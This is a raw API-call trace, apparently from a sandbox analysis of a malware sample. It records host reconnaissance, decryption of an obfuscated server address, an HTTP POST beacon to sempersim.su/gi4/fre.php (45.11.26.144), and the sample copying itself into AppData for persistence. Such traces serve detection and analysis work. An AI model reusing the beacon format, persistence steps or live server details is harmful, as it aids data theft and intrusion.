returned 0 [0122.102] GetLastError () returned 0x3f0 [0122.103] GetCurrentProcess () returned 0xffffffff [0122.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.104] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xdfb74 | out: TokenHandle=0xdfb74*=0x240) returned 1 [0122.104] GetProcessHeap () returned 0x5b0000 [0122.104] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0122.104] GetProcessHeap () returned 0x5b0000 [0122.104] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc628 [0122.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.106] GetTokenInformation (in: TokenHandle=0x240, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xdfb70 | out: TokenInformation=0x0, ReturnLength=0xdfb70) returned 0 [0122.106] GetProcessHeap () returned 0x5b0000 [0122.106] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0122.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.107] GetTokenInformation (in: TokenHandle=0x240, TokenInformationClass=0x1, TokenInformation=0x5c8590, TokenInformationLength=0x24, ReturnLength=0xdfb70 | out: TokenInformation=0x5c8590, ReturnLength=0xdfb70) returned 1 [0122.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.110] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x5c8598*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x5cc9f0, cchName=0xdfb60, ReferencedDomainName=0x5cc628, cchReferencedDomainName=0xdfb64, peUse=0xdfb5c | out: Name="RDhJ0CNFevzX", cchName=0xdfb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0xdfb64, peUse=0xdfb5c) returned 1 [0122.111] GetProcessHeap () returned 0x5b0000 [0122.111] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f44) returned 0x5d3e18 [0122.112] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.113] wvsprintfW (in: param_1=0x5d3e18, param_2="%s", arglist=0xdfb4c | out: param_1="XC64ZB") returned 6 [0122.113] GetProcessHeap () returned 0x5b0000 [0122.113] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf3c8 [0122.113] GetProcessHeap () returned 0x5b0000 [0122.114] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3e18 | out: hHeap=0x5b0000) returned 1 [0122.114] GetProcessHeap () returned 0x5b0000 [0122.114] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0122.114] CloseHandle (hObject=0x240) returned 1 [0122.114] GetProcessHeap () returned 0x5b0000 [0122.114] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc628 | out: hHeap=0x5b0000) returned 1 [0122.114] GetProcessHeap () returned 0x5b0000 [0122.115] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0122.115] GetProcessHeap () returned 0x5b0000 [0122.115] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf3c8 | out: hHeap=0x5b0000) returned 1 [0122.115] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.116] GetDesktopWindow () returned 0x10010 [0122.117] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.117] GetWindowRect (in: hWnd=0x10010, lpRect=0xdfb68 | out: lpRect=0xdfb68) returned 1 [0122.117] GetProcessHeap () returned 0x5b0000 [0122.117] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8) returned 0x5caa00 [0122.117] GetProcessHeap () returned 0x5b0000 [0122.117] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa00 | out: hHeap=0x5b0000) returned 1 [0122.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.119] GetUserNameW (in: lpBuffer=0xdf968, pcbBuffer=0xdfb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0xdfb70) returned 1 [0122.120] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x76be0000 [0122.121] GetProcAddress (hModule=0x76be0000, lpProcName="NetUserGetInfo") returned 0x6f9733a0 [0122.121] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0xdfb74 | out: bufptr=0x5d31a0*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0x8510de, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0122.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.129] AllocateAndInitializeSid (in: pIdentifierAuthority=0xdfb60, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0xdfb68 | out: pSid=0xdfb68*=0x5cf218*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0122.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.130] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x5cf218*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xdfb6c | out: IsMember=0xdfb6c) returned 1 [0122.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.131] GetNativeSystemInfo (in: lpSystemInfo=0xdfb44 | out: lpSystemInfo=0xdfb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0122.132] GetProcessHeap () returned 0x5b0000 [0122.132] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3158 [0122.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.133] CryptAcquireContextW (in: phProv=0xdf920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdf920*=0x0) returned 1 [0122.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.140] CryptAcquireContextW (in: phProv=0xdf920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdf920*=0x5d2ca0) returned 1 [0122.149] GetProcessHeap () returned 0x5b0000 [0122.149] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c87a0 [0122.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.150] CryptImportKey (in: hProv=0x5d2ca0, pbData=0x5c87a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdf924 | out: phKey=0xdf924*=0x5bde08) returned 1 [0122.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.152] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdf91c*=0x1, dwFlags=0x0) returned 1 [0122.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.153] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0122.153] GetProcessHeap () returned 0x5b0000 [0122.153] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c87a0 | out: hHeap=0x5b0000) returned 1 [0122.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.155] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3158, pdwDataLen=0xdf974 | out: pbData=0x5d3158, pdwDataLen=0xdf974) returned 1 [0122.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.156] CryptDestroyKey (hKey=0x5bde08) returned 1 [0122.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.157] CryptReleaseContext (hProv=0x5d2ca0, dwFlags=0x0) returned 1 [0122.157] GetProcessHeap () returned 0x5b0000 [0122.157] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5cc628 [0122.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.158] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0122.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.159] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0122.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.160] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0122.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.161] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0122.161] GetProcessHeap () returned 0x5b0000 [0122.161] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb010 [0122.161] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdf930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdf950 | out: ppResult=0xdf950*=0x0) returned 11001 [0122.168] GetProcessHeap () returned 0x5b0000 [0122.169] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb010 | out: hHeap=0x5b0000) returned 1 [0122.169] GetProcessHeap () returned 0x5b0000 [0122.169] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc628 | out: hHeap=0x5b0000) returned 1 [0122.170] GetProcessHeap () returned 0x5b0000 [0122.170] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3158 | out: hHeap=0x5b0000) returned 1 [0122.170] GetProcessHeap () returned 0x5b0000 [0122.170] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d35d8 [0122.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.171] CryptAcquireContextW (in: phProv=0xdf920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdf920*=0x0) returned 1 [0122.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.178] CryptAcquireContextW (in: phProv=0xdf920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdf920*=0x5d2ca0) returned 1 [0122.187] GetProcessHeap () returned 0x5b0000 [0122.187] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c87d0 [0122.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.188] CryptImportKey (in: hProv=0x5d2ca0, pbData=0x5c87d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdf924 | out: phKey=0xdf924*=0x5be248) returned 1 [0122.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.189] CryptSetKeyParam (hKey=0x5be248, dwParam=0x4, pbData=0xdf91c*=0x1, dwFlags=0x0) returned 1 [0122.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.191] CryptSetKeyParam (hKey=0x5be248, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0122.191] GetProcessHeap () returned 0x5b0000 [0122.191] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c87d0 | out: hHeap=0x5b0000) returned 1 [0122.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.192] CryptDecrypt (in: hKey=0x5be248, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d35d8, pdwDataLen=0xdf974 | out: pbData=0x5d35d8, pdwDataLen=0xdf974) returned 1 [0122.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.193] CryptDestroyKey (hKey=0x5be248) returned 1 [0122.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0122.194] CryptReleaseContext (hProv=0x5d2ca0, dwFlags=0x0) returned 1 [0122.194] GetProcessHeap () returned 0x5b0000 [0122.194] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0122.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.195] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0122.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.196] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0122.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0122.197] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0122.197] GetProcessHeap () returned 0x5b0000 [0122.197] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5caf20 [0122.198] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdf930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdf950 | out: ppResult=0xdf950*=0x5cb0d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0122.201] GetProcessHeap () returned 0x5b0000 [0122.202] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca970 [0122.202] socket (af=2, type=1, protocol=6) returned 0x250 [0122.202] connect (s=0x250, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0122.274] FreeAddrInfoW (pAddrInfo=0x5cb0d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0122.274] GetProcessHeap () returned 0x5b0000 [0122.274] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5d1b38 [0122.274] GetProcessHeap () returned 0x5b0000 [0122.274] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0122.275] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.276] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdf958 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0122.276] GetProcessHeap () returned 0x5b0000 [0122.276] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5d1bc0 [0122.276] GetProcessHeap () returned 0x5b0000 [0122.277] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0122.277] GetProcessHeap () returned 0x5b0000 [0122.277] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3110 [0122.277] GetProcessHeap () returned 0x5b0000 [0122.277] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0122.278] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0122.278] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdf958 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 186\r\nConnection: close\r\n\r\n") returned 236 [0122.278] GetProcessHeap () returned 0x5b0000 [0122.278] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc9f0 [0122.279] GetProcessHeap () returned 0x5b0000 [0122.279] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0122.279] send (s=0x250, buf=0x5cc9f0*, len=236, flags=0) returned 236 [0122.280] send (s=0x250, buf=0x5ccd70*, len=186, flags=0) returned 186 [0122.280] GetProcessHeap () returned 0x5b0000 [0122.280] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0122.280] recv (in: s=0x250, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 229 [0124.667] GetProcessHeap () returned 0x5b0000 [0124.667] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0124.667] GetProcessHeap () returned 0x5b0000 [0124.667] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3110 | out: hHeap=0x5b0000) returned 1 [0124.667] GetProcessHeap () returned 0x5b0000 [0124.668] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d1bc0 | out: hHeap=0x5b0000) returned 1 [0124.668] GetProcessHeap () returned 0x5b0000 [0124.668] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d1b38 | out: hHeap=0x5b0000) returned 1 [0124.668] closesocket (s=0x250) returned 0 [0124.669] GetProcessHeap () returned 0x5b0000 [0124.669] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca970 | out: hHeap=0x5b0000) returned 1 [0124.669] GetProcessHeap () returned 0x5b0000 [0124.669] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0124.669] GetProcessHeap () returned 0x5b0000 [0124.669] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d35d8 | out: hHeap=0x5b0000) returned 1 [0124.669] GetProcessHeap () returned 0x5b0000 [0124.670] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caf20 | out: hHeap=0x5b0000) returned 1 [0124.670] GetProcessHeap () returned 0x5b0000 [0124.670] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0124.670] GetProcessHeap () returned 0x5b0000 [0124.670] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0124.670] GetProcessHeap () returned 0x5b0000 [0124.670] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf338 | out: hHeap=0x5b0000) returned 1 [0124.670] GetProcessHeap () returned 0x5b0000 [0124.670] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0124.670] GetProcessHeap () returned 0x5b0000 [0124.671] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c4fd0 | out: hHeap=0x5b0000) returned 1 [0124.671] GetProcessHeap () returned 0x5b0000 [0124.671] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0124.671] GetProcessHeap () returned 0x5b0000 [0124.671] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5d61b0 [0124.671] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5d61b0, nSize=0x103 | out: lpFilename="C:\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe")) returned 0x1c [0124.671] GetProcessHeap () returned 0x5b0000 [0124.671] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5d5070 [0124.672] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0124.673] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5d5070 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0124.673] GetProcessHeap () returned 0x5b0000 [0124.673] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f58) returned 0x5d6e28 [0124.674] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0124.674] wvsprintfW (in: param_1=0x5d6e28, param_2="%s\\%s\\%s.exe", arglist=0xdfd44 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0124.674] GetProcessHeap () returned 0x5b0000 [0124.674] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x72) returned 0x5c7010 [0124.675] GetProcessHeap () returned 0x5b0000 [0124.675] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0124.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0124.677] StrStrW (lpFirst="C:\\Windows\\SysWOW64\\find.exe", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 0x0 [0124.677] GetProcessHeap () returned 0x5b0000 [0124.677] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5d6e28 [0124.678] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0124.679] wvsprintfW (in: param_1=0x5d6e28, param_2="%s\\%s", arglist=0xdfd60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0124.679] GetProcessHeap () returned 0x5b0000 [0124.679] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5d2ca0 [0124.679] GetProcessHeap () returned 0x5b0000 [0124.679] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0124.680] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0124.681] MoveFileExW (lpExistingFileName="C:\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.exe"), dwFlags=0x1) returned 0 [0124.681] CopyFileW (lpExistingFileName="C:\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.exe"), bFailIfExists=0) returned 1 [0125.872] GetProcessHeap () returned 0x5b0000 [0125.872] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5d4e48 [0125.873] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0125.874] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5d4e48 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0125.874] GetProcessHeap () returned 0x5b0000 [0125.874] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5d6e28 [0125.874] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0125.875] wvsprintfW (in: param_1=0x5d6e28, param_2="%s\\%s", arglist=0xdfb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0125.875] GetProcessHeap () returned 0x5b0000 [0125.875] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5ccad8 [0125.875] GetProcessHeap () returned 0x5b0000 [0125.876] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0125.876] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0125.876] GetProcessHeap () returned 0x5b0000 [0125.877] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f50) returned 0x5d6e28 [0125.877] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0125.878] wvsprintfW (in: param_1=0x5d6e28, param_2="%s\\%s.%s", arglist=0xdfb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0125.878] GetProcessHeap () returned 0x5b0000 [0125.878] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x72) returned 0x5c7610 [0125.878] GetProcessHeap () returned 0x5b0000 [0125.879] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0125.879] GetProcessHeap () returned 0x5b0000 [0125.879] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccad8 | out: hHeap=0x5b0000) returned 1 [0125.938] GetProcessHeap () returned 0x5b0000 [0125.939] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0125.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0125.940] AllocateAndInitializeSid (in: pIdentifierAuthority=0xdfcfc, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0xdfd04 | out: pSid=0xdfd04*=0x5cf2a8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0125.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0125.941] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x5cf2a8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xdfd08 | out: IsMember=0xdfd08) returned 1 [0125.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0125.942] GetProcessHeap () returned 0x5b0000 [0125.942] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x60) returned 0x5ccad8 [0125.943] 